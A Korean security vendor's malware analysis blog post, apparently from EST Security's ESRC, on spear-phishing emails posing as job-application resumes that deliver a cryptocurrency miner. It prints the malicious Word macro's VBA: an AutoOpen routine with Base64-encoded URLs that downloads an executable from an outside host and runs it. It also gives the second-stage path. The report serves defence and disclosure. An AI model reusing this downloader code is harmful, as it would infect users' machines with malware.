포스팅 내용

악성코드 분석 리포트

연말 채용 구인 공고 내용으로 위장한 가상화폐 채굴 감염 공격 주의



안녕하세요? 이스트시큐리티 시큐리티대응센터(ESRC)입니다.


특정 기업의 채용 구인 공고를 보고 연락한 내용처럼 위장한 해킹(스피어 피싱) 이메일이 국내에서 여럿 발견되고 있어 채용 및 구직관련 담당자 분들의 각별한 보안 주의가 필요합니다.


공격자는 한글로 작성한 이메일에 마치 구직자 이름의 채용서류 파일처럼 만든 악성파일을 압축해 첨부하고 있습니다.



[그림 1] 채용 구직 이메일로 위장한 스피어 피싱용 이메일



이력서 파일로 위장한 압축파일 내부에는 '0.png' 이미지 파일과 '(이름) 이력서.doc' 파일이 포함되어 있습니다. 이미지 파일은 아무런 내용이 없는 단순 파일이며, 이력서 파일을 열도록 현혹하는데 활용하는 것으로 추정됩니다.


이력서 파일은 2017년 12월 06일 오후 07시 41분에 압축된 것을 확인할 수 있으며, 마이크로소프트 오피스 문서 파일로 작성되어 있습니다.


공격자는 12월 06일 악성 파일을 제작해 준비한 다음 12월 07일 오후 12시 20분에 한국의 특정인에게 해킹 이메일을 발신했습니다.



[그림 2] 이메일에 첨부되어 있던 압축 파일 내부 화면



이메일을 받은 이용자가 압축을 해제하고, 이력서로 위장한 DOC 문서파일을 실행하게 되면 다음과 같은 화면이 나타납니다.


마치, 마이크로소프트 워드 파일의 버전이 호환되지 않아 문서 내용이 깨져 보이는 것처럼 안내하면서, 보안 상 위협에 노출될 수 있는 매크로가 실행되도록 [콘텐츠 사용] 활성화를 유도하게 됩니다.



[그림 3] 악성 DOC 문서가 실행되면 나오는 매크로 실행 유도 화면



해당 파일의 매크로에는 다음과 같은 VBA 코드가 포함되어 있습니다.


down 명령어 부분에 Base64 코드가 인코딩되어 있으며, 이 부분을 디코딩하면 'monecom.ddns.net/mm.exe' 악성 URL 주소와 감염자 정보 수집 목적의 'monecom.ddns.net/count.php' 사이트가 연결됩니다.



[그림 4] 매크로 실행으로 연결되는 악성 파일 주소



- 일부 생략 -


Sub AutoOpen()

    

Dim down, dec_down

down = "aHR0cDovL21vbmVjb20uZGRucy5uZXQvbW0uZXhl"

dec_down = Base64Decode(down)


Dim downcount, dec_count

downcount = "aHR0cDovL21vbmVjb20uZGRucy5uZXQvY291bnQucGhw"

dec_count = Base64Decode(downcount)


Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")

Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")


xHttp.Open "GET", dec_count, False

xHttp.Send

xHttp.Open "GET", dec_down, False

xHttp.Send

'MsgBox dec

With bStrm

 .Type = 1 '//binary

.Open

 .Write xHttp.responseBody

 .savetofile "00.exe", 2 '//overwrite

 

End With

Shell ("00.exe")

 

End Sub


Function Base64Encode(sText)

    Dim oXML, oNode

    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")

    Set oNode = oXML.CreateElement("base64")

    oNode.dataType = "bin.base64"

    oNode.nodeTypedValue = Stream_StringToBinary(sText)

    Base64Encode = oNode.Text

    Set oNode = Nothing

    Set oXML = Nothing

End Function

 

- 이하 생략 -



공격자는 이렇게 매크로를 이용해 악성파일을 유포하고 불특정 다수 기업의 채용 담당자들을 대상으로 감염을 시도했습니다.


특히, 유포된 악성파일이 한국어 기반으로 제작되어 있고, 제작자는 'Peter' 영문표기의 윈도우즈 계정명을 사용하고 있다는 것을 알 수 있습니다.


* PDB 경로 : C:\Users\Peter\Desktop\20171201프로젝트\20171201프로젝트\obj\Debug\eiCos5ASS.pdb



[그림 5] 악성파일 내부에 한글이 포함된 화면



악성파일이 실행되면 또 다시 파일을 하나 다운로드합니다.


다운로드 경로 : monecom.ddns.net/mm.zip



[그림 6] 추가 악성파일 다운로드 경로



추가로 다운로드되는 'mm.zip' 파일에는 다양한 종류의 모듈이 포함되어 있고 내부에는 암호 화페 채굴 기능 추정의 파일(minerd.exe)이 포함되어 있습니다. 


공격자는 여러 정황상 한글을 사용하고 있다는 것도 알 수 있습니다.



[그림 7] 추가로 다운로드된 가상화폐 채굴용 파일



'minerd.exe' 파일은 가상화폐 채굴 기능이 있는 'crss.exe' 파일을 활용해 작동을 하게 됩니다.


공격자는 'milqui1979@mail.ru' 러시아 이메일 계정을 사용합니다.



[그림 8] 러시아 이메일 계정을 사용한 파일 화면



이처럼 공격자는 구직 채용 내용으로 사칭한 한국어 맞춤형 스피어 피싱 공격 기법을 활용해 가상화폐 채굴 기반 악성파일을 유포한 것입니다.


기업의 채용 및 인사담당자 분들은 구직 문의 등으로 접수되는 이메일도 항상 주의하시고, 매크로 기능이 포함된 문서파일의 경우 절대로 열람하지 않는 것이 좋습니다. 또한, 문서 작성 프로그램은 항상 최신 업데이트를 유지하는 노력도 필요합니다.


아울러 비슷한 사례로 얼마전 비너스락커 랜섬웨어 제작자도 이메일을 통해 가상화폐 채굴 공격을 수행한 바 있습니다.





알약에서는 Misc.Riskware.BitCoinMiner 탐지명 등으로 추가된 상태이며, 또 다른 변종 출현에 대비에 보안 모니터링을 강화하고 있습니다.





  1. 2017.12.11 18:56  수정/삭제  댓글쓰기

    비밀댓글입니다

    • 알약(Alyac) 2017.12.12 10:06 신고  수정/삭제

      안녕하세요? 이스트시큐리티입니다.

      제보해 주신 내용 잘 확인해서 조치했습니다.^^

      감사합니다.

티스토리 방명록 작성
name password homepage